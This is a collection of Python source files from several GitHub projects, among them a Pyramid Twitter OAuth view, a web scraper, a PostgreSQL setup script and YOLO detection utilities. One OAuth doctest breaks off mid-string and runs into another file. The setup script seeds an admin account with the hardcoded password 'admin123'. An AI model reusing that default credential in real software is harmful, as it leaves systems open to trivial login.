= get_vandermonde_matrix(segmentation_inputs=xy,\r\n nm=nm,\r\n is_loss_v1=True,\r\n class_type=ClassValues.CIRCLES,\r\n n_coords=n_coords)\r\n\r\n i_sample = 0\r\n while i_sample < predictions.shape[0]:\r\n if plot_predicted_models:\r\n sample_vander = vanders[i_sample]\r\n else:\r\n sample_vander = None\r\n\r\n # retrieve coordinates of circle\r\n if len(xy.shape) == 4:\r\n sample_xy = xy[i_sample, :, 0, 0:2]\r\n else:\r\n sample_xy = xy[i_sample, :, 0:2]\r\n\r\n sample_preds = predictions[i_sample]\r\n plot_multi_model_sample(i_sample, sample_xy, sample_preds, path, plot, plot_predicted_models=plot_predicted_models, vander=sample_vander)\r\n i_sample += 
100\r\n","repo_name":"WilliamBonvini/ulmmcm","sub_path":"utils/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":7368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
+{"seq_id":"40838360131","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Provides authenticate, authorize and callback views and a failed view to\n  redirect to when OAuth fails, e.g.: when Twitter is down.\n\"\"\"\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nimport tweepy\n\nfrom formencode import Invalid\n\nfrom pyramid.httpexceptions import HTTPForbidden, HTTPFound, HTTPUnauthorized\nfrom pyramid.security import forget, remember, unauthenticated_userid\nfrom pyramid.security import NO_PERMISSION_REQUIRED as PUBLIC\nfrom zope.interface.registry import ComponentLookupError\n\nfrom pyramid_basemodel import save as save_to_db\nfrom pyramid_simpleauth.events import UserSignedUp, UserLoggedIn\nfrom pyramid_simpleauth.schema import RequestPath\nfrom pyramid_simpleauth.model import User\n\nfrom .hooks import get_handler\nfrom .model import get_existing_twitter_account, TwitterAccount, TwitterProfile\n\ndef forbidden_view(request):\n    \"\"\"Handle a user being denied access to a resource or view by redirecting\n      to authenticate via Twitter. See the ``pyramid_twitterauth.includeme``\n      function for info on how to expose this view.\n      \n      Setup::\n      \n          >>> from mock import Mock\n          >>> from pyramid_twitterauth import view\n          >>> _unauthenticated_userid = view.unauthenticated_userid\n          >>> view.unauthenticated_userid = Mock()\n          >>> mock_request = Mock()\n          >>> mock_request.path = '/forbidden/page'\n          >>> mock_request.route_url.return_value = '/oauth/twitter/authenticate'\n      \n      If the user is already logged in, it means they don't have the requisite\n      permission, so we raise a 403 Forbidden error::\n      \n          >>> view.unauthenticated_userid.return_value = 1234\n          >>> response = forbidden_view(mock_request)\n          >>> response.status\n          '403 Forbidden'\n      \n      Otherwise we redirect to the authenticate view::\n      \n          >>> view.unauthenticated_userid.return_value = None\n          >>> response = forbidden_view(mock_request)\n          >>> kwargs = {\n          ...     '_query': (('next', '/forbidden/page'),),\n          ...     'traverse': ('authenticate',)\n          ... 
}\n >>> mock_request.route_url.assert_called_with('twitterauth', **kwargs)\n >>> response.location\n '/oauth/twitter/authenticate'\n >>> response.status\n '302 Found'\n \n Teardown::\n \n >>> view.unauthenticated_userid = _unauthenticated_userid\n \n \"\"\"\n \n if unauthenticated_userid(request):\n return HTTPForbidden()\n query = (('next', request.path),)\n url = request.route_url('twitterauth', traverse=('authenticate',), _query=query)\n return HTTPFound(location=url)\n\n\ndef _redirect_to_failed(request, redirect_cls=HTTPFound):\n \"\"\"Redirect to the failed view.\n \n Setup::\n \n >>> from mock import Mock\n >>> mock_request = Mock()\n >>> mock_request.route_url.return_value = 'redirect url'\n >>> mock_redirect_cls = Mock()\n >>> mock_redirect_cls.return_value = 'http found'\n \n Test::\n \n >>> _redirect_to_failed(mock_request, redirect_cls=mock_redirect_cls)\n 'http found'\n >>> kwargs = dict(traverse=('failed',))\n >>> mock_request.route_url.assert_called_with('twitterauth', **kwargs)\n >>> mock_redirect_cls.assert_called_with(location='redirect url')\n \n \"\"\"\n \n url = request.route_url('twitterauth', traverse=('failed',))\n return redirect_cls(location=url)\n\ndef _do_oauth_redirect(request, is_authenticate, handler_factory=get_handler):\n \"\"\"Start the OAuth dance by getting a request token from the Twitter API,\n storing it in the session and then redirecting to Twitter.\n \n Setup::\n \n >>> from mock import Mock\n >>> mock_request = Mock()\n >>> mock_request.session = {}\n >>> mock_handler = Mock()\n >>> mock_handler.get_authorization_url.return_value = 'url'\n >>> mock_handler.request_token.key = 'key'\n >>> mock_handler.request_token.secret = 'secret'\n >>> mock_handler_factory = Mock()\n >>> mock_handler_factory.return_value = mock_handler\n \n Stores whether this OAuth attempt is a signin or not::\n \n >>> return_value = _do_oauth_redirect(mock_request, True,\n ... handler_factory=mock_handler_factory)\n >>> mock_request.session['twitter_oauth_is_authenticate']\n True\n \n If there's a ``next`` param in the request, stores that too::\n \n >>> mock_request.params = {'next': '/foo/bar'}\n >>> return_value = _do_oauth_redirect(mock_request, True,\n ... handler_factory=mock_handler_factory)\n >>> mock_request.session.get('twitter_oauth_next')\n u'/foo/bar'\n \n As long as it's a valid path::\n \n >>> mock_request.session = {}\n >>> mock_request.params = {'next': '\n# \n# \n# \n# \n# LOG\n#

\n# \n# \n# \"\"\"\n#     return Response(text=index, content_type='text/html')\n\n\ndef init_app():\n    \"\"\"Prepare aiohttp web server for further running.\"\"\"\n    app = Application()\n\n    init_logging()\n    init_db(app)\n\n    sio.attach(app)\n    aiojobs_setup(app)\n\n    app.add_routes(monobank_routes)\n    app.add_routes(internal_routes)\n\n    app.on_startup.append(init_config)\n\n    app.middlewares.append(db)\n    app.middlewares.append(body_validator_middleware)\n    app.middlewares.append(error_middleware({\n        404: handle_404,\n        405: handle_405,\n        500: handle_500\n    }))\n\n    return app\n","repo_name":"SpentlessInc/spentless-collector","sub_path":"collector/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"72795624161","text":"import csv\nimport datetime\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nfrom collections import Counter \nfrom stop_words import get_stop_words\n\ndef clean_word(word):\n    word = word.replace('!', '')\n    word = word.replace('?', '')\n    word = word.replace('.', '')\n    word = word.replace(':', '')\n    word = word.replace(';', '')\n    word = word.replace(',', '')\n    word = word.replace('(', '')\n    word = word.replace(')', '')\n    word = word.replace('-', '')\n    word = word.replace('2', '')\n    word = word.replace('3', '')\n    word = word.replace('4', '')\n    word = word.replace('5', '')\n    word = word.replace('\"\"', '')\n    return word\n\ndef clean_up_words(words):\n    new_words = []\n    pkg_stop_words = get_stop_words('en')\n    #print(pkg_stop_words)\n    my_stop_words = ['the', 'is', 'and']\n    for word in words:\n        word = word.lower()\n        cleaned_word = clean_word(word)\n        if word in my_stop_words or word in pkg_stop_words:\n            pass\n        else:\n            new_words.append(cleaned_word)\n    return new_words\n\ndef create_csv_path(csv_path):\n    if not os.path.exists(csv_path):\n        with open(csv_path, 'w') as csvfile:\n            header_columns = ['word', 'count', 'timestamp']\n            writer = csv.DictWriter(csvfile, fieldnames=header_columns)\n            writer.writeheader() \n\n\nstatic_url = 'https://www.lexologics.nl/logics'\nmy_url = input('Enter the URL to scrape (or press enter for default): ')\nmy_html_tag = input('Enter the HTML tag for scraping (or press enter for <body>): ')\nmy_div_class_tag = ''\n\nif not my_url:\n    my_url = static_url\nif not my_html_tag:\n    my_html_tag = 'body'\nelif my_html_tag == 'div':\n    my_div_class_tag = input('Which class: ')\n\nprint(f'Grabbing {my_url} ...')\ndomain = urlparse(my_url).netloc\nprint('via domain', domain)\n\nresponse = requests.get(my_url)\n\nprint(\"Status is:\", response.status_code)\n\n#if response.status_code == 200:\n#    print('Go ahead and scrape')\n#else:\n#    print(\"You can't scrape this\", response.status_code)\n\nif response.status_code != 200:\n    print(\"You can't scrape this\", response.status_code)\nelse:\n    print(f'Scraping {my_url}...', response.status_code)\n    #print(response.text)\n    html = response.text\n    soup = BeautifulSoup(html, 'html.parser')\n\n    if my_html_tag == 'body':\n        body_ = soup.find('body') \n        print(body_.text)\n        print('\\nFind', len(body_.text), f'characters in the <{my_html_tag}> tag')\n    elif my_html_tag == 'div':\n        body_ = soup.find('div', {'class': {my_div_class_tag}}) \n        create_list = list(body_)\n        print('\\nFind', len(body_), f'object(s) in the list for the <{my_html_tag}> tag')\n        \n        # Showing 'one' record from the list\n        show = int(input(f'Which record to show 0 / {len(body_)-1}: '))\n\n        if show < 
int(len(body_)):\n create_list = list(body_)\n print(create_list[show])\n else:\n print('Index out of bound') \n\n else:\n body_ = soup.find_all(my_html_tag)\n print('\\nFind', len(body_), f'objects in the list for the <{my_html_tag}> tag')\n\n words = body_.text.split()\n clean_words = clean_up_words(words)\n word_counts = Counter(clean_words)\n print(word_counts.most_common(30)) \n \n filename = domain.replace('.', '-') + '.csv'\n path = 'csv/' + filename\n time_stamp = datetime.datetime.now()\n create_csv_path(path)\n with open(path, 'a') as csvfile:\n header_columns = ['word', 'count', 'timestamp']\n writer = csv.DictWriter(csvfile, fieldnames=header_columns)\n for word, count in word_counts.most_common(30):\n writer.writerow({\n 'count': count,\n 'word': word,\n 'timestamp': time_stamp\n })\n \n\n\n\n\n","repo_name":"lexologics/scraping","sub_path":"src/scrape1.py","file_name":"scrape1.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19593528305","text":"import logging\n\nfrom provisioner.singleton import Singleton\n\nlog = logging.getLogger(__name__)\n\n\nclass ConfigMap(metaclass=Singleton):\n \"\"\"\n Global configuration map instance.\n\n A dictionary-like class. An instance of this class manages configuration\n for an application run. This class is supposed to take care of any\n configuration source precedence handling.\n \"\"\"\n\n def __init__(self, **kwargs):\n opts = [\n \"action\",\n \"debug\",\n \"distro\",\n \"executable\",\n \"exec_args\",\n \"machine\",\n \"script\",\n \"ssh_key_file\",\n ]\n\n self._values = dict(zip(opts, [None] * len(opts)))\n self._values.update(kwargs)\n\n def __contains__(self, item):\n return item in self._values\n\n def __getitem__(self, key):\n if type(key) is not str:\n raise TypeError\n\n return self._values[key]\n\n def __setitem__(self, key, value):\n if type(key) is not str:\n raise TypeError\n\n self._values[key] = value\n","repo_name":"libvirt/libvirt-gitlab-executor","sub_path":"src/provisioner/configmap.py","file_name":"configmap.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"42448395069","text":"from utils.file import read_file_content\r\n\r\n\r\ndef display(field):\r\n screen = [None]*6\r\n for x in range(6):\r\n screen[x] = [False]*50\r\n\r\n for (x, y) in field:\r\n screen[y][x] = True\r\n\r\n for row in screen:\r\n s = \"\";\r\n for b in row:\r\n if b:\r\n s += \"#\"\r\n else:\r\n s += \".\"\r\n print(s)\r\n\r\n\r\ndef handle_input(lines):\r\n field = {}\r\n for line in lines:\r\n new_field = {}\r\n (cmd, param) = line.split(\" \", 1)\r\n if cmd == \"rect\":\r\n new_field = field\r\n (width, height) = [int(x) for x in param.split(\"x\")]\r\n # print(\"Rect (\" + str(width) + \", \" + str(height) + \")\")\r\n for x in range(width):\r\n for y in range(height):\r\n new_field[(x, y)] = True\r\n elif cmd == \"rotate\":\r\n (col, coords) = param.split(\" \", 1)\r\n (index, value) = [int(x) for x in coords[2:].split(\" by \")]\r\n # print(\"Rotate (\" + col + \", \" + str(index) + \", \" + str(value) + \")\")\r\n if col == \"row\":\r\n for (x, y) in field:\r\n if y == index:\r\n new_field[((x+value) % 50, y)] = True\r\n else:\r\n new_field[(x, y)] = True\r\n elif col == \"column\":\r\n for (x, y) in field:\r\n if x == index:\r\n new_field[(x, (y+value) % 6)] = True\r\n else:\r\n new_field[(x, y)] = True\r\n field = 
new_field\r\n return field\r\n\r\n\r\ndef solve_part1(inp: str) -> int:\r\n lines = inp.split(\"\\n\")\r\n\r\n field = handle_input(lines)\r\n\r\n return len(field)\r\n\r\n\r\ndef solve_part2(inp: str) -> int:\r\n lines = inp.split(\"\\n\")\r\n\r\n field = handle_input(lines)\r\n display(field)\r\n\r\n return -1\r\n\r\n\r\ndef test_part1():\r\n inp = read_file_content(\"inputs/test\")\r\n answer = int(read_file_content(\"inputs/ans1\"))\r\n\r\n result = solve_part1(inp)\r\n if result == answer:\r\n print(\"Test successful\")\r\n else:\r\n print(\"Test unsuccessful: \" + str(result) + \", expected: \" + str(answer))\r\n\r\n\r\ndef test_part2():\r\n inp = read_file_content(\"inputs/test\")\r\n answer = int(read_file_content(\"inputs/ans2\"))\r\n\r\n result = solve_part2(inp)\r\n if result == answer:\r\n print(\"Test successful\")\r\n else:\r\n print(\"Test unsuccessful: \" + str(result) + \", expected: \" + str(answer))\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n inp = read_file_content(\"inputs/input\")\r\n\r\n print(\" --- Part 1 --- \")\r\n test_part1()\r\n print(\"Part 1 result:\\t\" + str(solve_part1(inp)))\r\n\r\n print(\"\\n --- Part 2 ---\")\r\n test_part2()\r\n print(\"Part 2 result:\\t\" + str(solve_part2(inp)))\r\n","repo_name":"Aeilko/Advent-of-Code-2016","sub_path":"day08/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2907557897","text":"from tools.logging import logger\nfrom tools.database.db_con import get_db_instance\nfrom tools.database.tables.users.add_user import add_user\nfrom tools.database.tables.roles.add_role import add_role\nimport psycopg2\nimport os\n\ndef check_if_table_exist(table_name, cur):\n command = \"\"\"\n SELECT EXISTS (\n SELECT relname\n FROM pg_class\n WHERE relname = '{}'\n )\n \"\"\".format(table_name)\n cur.execute(command)\n result = cur.fetchone()[0]\n return result\n\ndef init_user_table(cur):\n # Check if the user table exist. If not, create it\n if not check_if_table_exist(\"users\", cur):\n logger.info(\"CREATE USERS TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS users(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n firstname varchar(24) NOT NULL,\n lastname varchar(24) NOT NULL,\n email varchar(50) NOT NULL UNIQUE,\n password varchar(255) NOT NULL,\n role uuid NOT NULL,\n FOREIGN KEY(role) REFERENCES roles(id),\n isActive boolean NOT NULL DEFAULT true\n )\n \"\"\"\n cur.execute(command)\n # Check if the admin user exist. If not create it\n command = \"\"\"\n SELECT EXISTS (\n SELECT email\n FROM public.users\n WHERE email = 'admin@blt.com'\n )\n \"\"\"\n cur.execute(command)\n result = cur.fetchone()[0]\n if not result:\n logger.info(\"CREATE ADMIN USER\")\n role_command = \"\"\"\n SELECT *\n FROM public.roles\n WHERE name = 'admin'\n \"\"\"\n cur.execute(role_command)\n role_id = cur.fetchone()[0]\n add_user(cur, \"admin\", \"admin\", \"admin@blt.com\", \"admin123\", role_id)\n \ndef init_roles_table(cur):\n # Check if the user table exist. If not, create it\n if not check_if_table_exist(\"roles\", cur):\n logger.info(\"CREATE ROLES TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS roles(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(24) NOT NULL,\n levelOfAccess integer NOT NULL CHECK (levelOfAccess >= 0)\n )\n \"\"\"\n cur.execute(command)\n # Check if the admin role exist. 
If not create it\n command = \"\"\"\n SELECT EXISTS (\n SELECT name\n FROM public.roles\n WHERE name = 'admin'\n )\n \"\"\"\n cur.execute(command)\n result = cur.fetchone()[0]\n if not result:\n logger.info(\"CREATE ADMIN ROLE\")\n add_role(cur, \"admin\", 1)\n \n # Check if the user role exist. If not create it\n command = \"\"\"\n SELECT EXISTS (\n SELECT name\n FROM public.roles\n WHERE name = 'user'\n )\n \"\"\"\n cur.execute(command)\n result = cur.fetchone()[0]\n if not result:\n logger.info(\"CREATE USER ROLE\")\n add_role(cur, \"user\",0)\n \ndef init_categories_table(cur):\n # Check if the categories table exist. If not, create it\n if not check_if_table_exist(\"categories\", cur):\n logger.info(\"CREATE CATEGORIES TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS categories(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(64) NOT NULL UNIQUE\n )\n \"\"\"\n cur.execute(command)\n \ndef init_subcategories_table(cur):\n # Check if the categories table exist. If not, create it\n if not check_if_table_exist(\"subcategories\", cur):\n logger.info(\"CREATE SUBCATEGORIES TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS subcategories(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(64) NOT NULL UNIQUE\n )\n \"\"\"\n cur.execute(command)\n \ndef init_content_table(cur):\n # Check if the categories table exist. If not, create it\n if not check_if_table_exist(\"contents\", cur):\n logger.info(\"CREATE CONTENTS TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS contents(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(64) NOT NULL,\n path text NOT NULL,\n category uuid NOT NULL,\n FOREIGN KEY(category) REFERENCES categories(id),\n subcategory uuid NOT NULL,\n FOREIGN KEY(subcategory) REFERENCES subcategories(id),\n type varchar(24) NOT NULL\n )\n \"\"\"\n cur.execute(command)\n \ndef init_database(cur):\n cur.execute(\"SELECT 1 FROM pg_catalog.pg_database WHERE datname = 'blt'\")\n exists = cur.fetchone()\n if not exists:\n cur.execute('CREATE DATABASE blt')\n\ndef init_db():\n logger.info(\"INIT DB\")\n db = psycopg2.connect(host=os.getenv('DB_HOST'), user=os.getenv('DB_USER'), password=os.getenv('DB_PASS'), port=os.getenv('DB_PORT'))\n db.autocommit = True\n cursor = db.cursor()\n init_database(cursor)\n db.close()\n db, cursor = get_db_instance()\n \n init_roles_table(cursor)\n init_user_table(cursor)\n init_categories_table(cursor)\n init_subcategories_table(cursor)\n init_content_table(cursor)\n \n db.commit()","repo_name":"irvinglopezcuriel/BrainLearningTechnology","sub_path":"tools/database/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40808979955","text":"import numpy as np\nimport cv2 as cv\n\ndef apply_multi_band(func, arr, args, kargs):\n results = []\n for i in range(arr.shape[0]):\n r = func(arr[i], *args, **kargs)\n results.append(r)\n return results\n\ndef multi_band(func):\n\n def _f(*args, **kargs):\n if 'channel_last' in kargs:\n channel_last = kargs['channel_last']\n else:\n channel_last = False\n arr = args[0]\n if len(arr.shape) == 3:\n if channel_last:\n arr = np.transpose(arr, (2, 0, 1))\n result = apply_multi_band(func, arr, args[1:], kargs)\n result = np.stack(result, 0)\n if channel_last:\n result = np.transpose(result, (1, 2, 0))\n return result\n else:\n return func(*args, **kargs)\n return _f\n\n@multi_band\ndef resize(arr, size = None, scale = None, channel_last = False, interpolation 
= cv.INTER_LINEAR ):\n if size is None and scale is None:\n return arr\n assert len(arr.shape) == 2\n ow, oh = arr.shape\n # print(size)\n if size is None:\n size = (int(ow * scale[0]), int(oh * scale[1]))\n if size[0] == ow and size[1] == oh:\n return arr\n arr = cv.resize(arr, size, interpolation = interpolation )\n return arr \n\n@multi_band\ndef crop(arr, x, y, w, h, channel_last = False):\n assert len(arr.shape) == 2\n ow, oh = arr.shape\n assert x + w <= ow and y + h <= oh\n narr = arr[x:x+w, y:y+h]\n return narr\n\n@multi_band\ndef flip(arr, h_v, channel_last = False):\n assert len(arr.shape) == 2\n assert h_v in (0, 1)\n arr = np.flip(arr, axis=h_v)\n return arr\n\n@multi_band\ndef rot90(arr, k, r = False, channel_last = False):\n assert len(arr.shape) == 2\n if r:\n k = -k\n arr = np.rot90(arr, k, (0, 1))\n return arr\n","repo_name":"w-copper/weakly-pseudo-label","sub_path":"weak_pseudo_label/dataset/pipeline/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10825206930","text":"import os\nimport codecs\nimport math\nimport time\nimport tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\nimport torchvision\nimport cv2\n\ndef letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n if isinstance(new_shape, int):\n new_shape = (new_shape, new_shape)\n\n # Scale ratio (new / old)\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n ratio = r, r # width, height ratios\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n elif scaleFill: # stretch\n dw, dh = 0.0, 0.0\n new_unpad = new_shape\n ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img, ratio, (dw, dh)\n\n\n\ndef resize(image, size):\n image = F.interpolate(image.unsqueeze(0), size=size, mode=\"nearest\").squeeze(0)\n return image\n\ndef pad_to_square(img, pad_value):\n c, h, w = img.shape\n dim_diff = np.abs(h - w)\n # (upper / left) padding and (lower / right) padding\n pad1, pad2 = dim_diff // 2, dim_diff - dim_diff // 2\n # Determine padding\n pad = (0, 0, pad1, pad2) if h <= w else (pad1, pad2, 0, 0)\n # Add padding\n img = F.pad(img, pad, \"constant\", value=pad_value)\n\n return img, pad\n\n\ndef load_classes(classes_path):\n \"\"\"\n Loads class labels at 'path'\n \"\"\"\n classes_path = os.path.expanduser(classes_path)\n with codecs.open(classes_path, 'r', 'utf-8') as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n\ndef 
rescale_boxes_rect(coords, img1_shape, img0_shape, ratio_pad=None):\n # Rescale coords (xyxy) from img1_shape to img0_shape\n if ratio_pad is None: # calculate from img0_shape\n gain = max(img1_shape) / max(img0_shape) # gain = old / new\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\n else:\n gain = ratio_pad[0][0]\n pad = ratio_pad[1]\n\n coords[:, [0, 2]] -= pad[0] # x padding\n coords[:, [1, 3]] -= pad[1] # y padding\n coords[:, :4] /= gain\n clip_coords(coords, img0_shape)\n return coords\n\n\ndef clip_coords(boxes, img_shape):\n # Clip bounding xyxy bounding boxes to image shape (height, width)\n boxes[:, 0].clamp_(0, img_shape[1]) # x1\n boxes[:, 1].clamp_(0, img_shape[0]) # y1\n boxes[:, 2].clamp_(0, img_shape[1]) # x2\n boxes[:, 3].clamp_(0, img_shape[0]) # y2\n\ndef rescale_boxes(boxes, current_dim, original_shape):\n \"\"\" Rescales bounding boxes to the original shape \"\"\"\n orig_h, orig_w = original_shape\n # The amount of padding that was added\n pad_x = max(orig_h - orig_w, 0) * (current_dim / max(original_shape))\n pad_y = max(orig_w - orig_h, 0) * (current_dim / max(original_shape))\n # Image height and width after padding is removed\n unpad_h = current_dim - pad_y\n unpad_w = current_dim - pad_x\n # Rescale bounding boxes to dimension of original image\n boxes[:, 0] = ((boxes[:, 0] - pad_x // 2) / unpad_w) * orig_w\n boxes[:, 1] = ((boxes[:, 1] - pad_y // 2) / unpad_h) * orig_h\n boxes[:, 2] = ((boxes[:, 2] - pad_x // 2) / unpad_w) * orig_w\n boxes[:, 3] = ((boxes[:, 3] - pad_y // 2) / unpad_h) * orig_h\n return boxes\n\n\ndef xywh2xyxy(x):\n y = x.new(x.shape)\n y[..., 0] = x[..., 0] - x[..., 2] / 2\n y[..., 1] = x[..., 1] - x[..., 3] / 2\n y[..., 2] = x[..., 0] + x[..., 2] / 2\n y[..., 3] = x[..., 1] + x[..., 3] / 2\n return y\n\ndef box_iou(box1, box2):\n # https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py\n \"\"\"\n Return intersection-over-union (Jaccard index) of boxes.\n Both sets of boxes are expected to be in (x1, y1, x2, y2) format.\n Arguments:\n box1 (Tensor[N, 4])\n box2 (Tensor[M, 4])\n Returns:\n iou (Tensor[N, M]): the NxM matrix containing the pairwise\n IoU values for every element in boxes1 and boxes2\n \"\"\"\n\n def box_area(box):\n # box = 4xn\n return (box[2] - box[0]) * (box[3] - box[1])\n\n area1 = box_area(box1.t())\n area2 = box_area(box2.t())\n\n # inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)\n inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)\n return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)\n\ndef non_max_suppression(prediction, conf_thres=0.1, iou_thres=0.6, multi_label=True, classes=None, agnostic=False):\n \"\"\"\n Performs Non-Maximum Suppression on inference results\n Returns detections with shape:\n nx6 (x1, y1, x2, y2, conf, cls)\n \"\"\"\n\n # Settings\n merge = True # merge for best mAP\n min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height\n time_limit = 10.0 # seconds to quit after\n\n t = time.time()\n nc = prediction[0].shape[1] - 5 # number of classes\n multi_label &= nc > 1 # multiple labels per box\n output = [None] * prediction.shape[0]\n for xi, x in enumerate(prediction): # image index, image inference\n # Apply constraints\n x = x[x[:, 4] > conf_thres] # confidence\n x = x[((x[:, 2:4] > min_wh) & (x[:, 2:4] < max_wh)).all(1)] # width-height\n\n # If none remain process next image\n if not x.shape[0]:\n 
continue\n\n        # Compute conf\n        x[..., 5:] *= x[..., 4:5]  # conf = obj_conf * cls_conf\n\n        # Box (center x, center y, width, height) to (x1, y1, x2, y2)\n        box = xywh2xyxy(x[:, :4])\n\n        # Detections matrix nx6 (xyxy, conf, cls)\n        if multi_label:\n            i, j = (x[:, 5:] > conf_thres).nonzero().t()\n            x = torch.cat((box[i], x[i, j + 5].unsqueeze(1), j.float().unsqueeze(1)), 1)\n        else:  # best class only\n            conf, j = x[:, 5:].max(1)\n            x = torch.cat((box, conf.unsqueeze(1), j.float().unsqueeze(1)), 1)[conf > conf_thres]\n\n        # Filter by class\n        if classes:\n            x = x[(j.view(-1, 1) == torch.tensor(classes, device=j.device)).any(1)]\n\n        # Apply finite constraint\n        # if not torch.isfinite(x).all():\n        #     x = x[torch.isfinite(x).all(1)]\n\n        # If none remain process next image\n        n = x.shape[0]  # number of boxes\n        if not n:\n            continue\n\n        # Sort by confidence\n        # x = x[x[:, 4].argsort(descending=True)]\n\n        # Batched NMS\n        c = x[:, 5] * 0 if agnostic else x[:, 5]  # classes\n        boxes, scores = x[:, :4].clone() + c.view(-1, 1) * max_wh, x[:, 4]  # boxes (offset by class), scores\n        i = torchvision.ops.boxes.nms(boxes, scores, iou_thres)\n        if merge and (1 < n < 3E3):  # Merge NMS (boxes merged using weighted mean)\n            try:  # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)\n                iou = box_iou(boxes[i], boxes) > iou_thres  # iou matrix\n                weights = iou * scores[None]  # box weights\n                x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True)  # merged boxes\n                # i = i[iou.sum(1) > 1]  # require redundancy\n            except:  # possible CUDA error https://github.com/ultralytics/yolov3/issues/1139\n                print(x, i, x.shape, i.shape)\n                pass\n\n        output[xi] = x[i]\n        if (time.time() - t) > time_limit:\n            break  # time limit exceeded\n\n    return output\n","repo_name":"selous123/yolov3-pytorch-custom","sub_path":"deploy_scripts/my_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8318,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"}
+{"seq_id":"15109962735","text":"from django.core.validators import FileExtensionValidator\nfrom django.db import models\nfrom django.urls import reverse\n\nfrom organization.models import OrganizationProduct\n\n\nclass Product(models.Model):\n    \"\"\"\n    Product Model That Has 7 Fields and a Meta Class For Configuration.\n    \"\"\"\n    name = models.CharField(max_length=50)\n    price = models.DecimalField(max_digits=10,\n                                decimal_places=2)\n    tax = models.BooleanField(default=True)\n    pdf_file = models.FileField(upload_to='files/pdf_files/%Y/%m/%d',\n                                validators=[FileExtensionValidator(allowed_extensions=['pdf']), ])\n    pic_file = models.FileField(upload_to='files/pic_files/%Y/%m/%d',\n                                validators=[FileExtensionValidator(allowed_extensions=['jpg', 'jpeg', 'png', 'svg']), ])\n    technical_report = models.TextField()\n    related_products = models.ManyToManyField(OrganizationProduct,\n                                              related_name='related_products')\n\n    class Meta:\n        \"\"\"\n        Meta Class Contains ordering for order in database\n        \"\"\"\n        ordering = ('-price', '-name',)\n\n    def __str__(self):\n        return self.name\n\n    def get_absolute_url(self):\n        \"\"\"\n        Canonical Url for access the core Class\n        \"\"\"\n        return reverse('inventory:detail_product', args=[self.id])\n","repo_name":"MohammadJavadShamloo/FinalProject_Maktab_50","sub_path":"inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
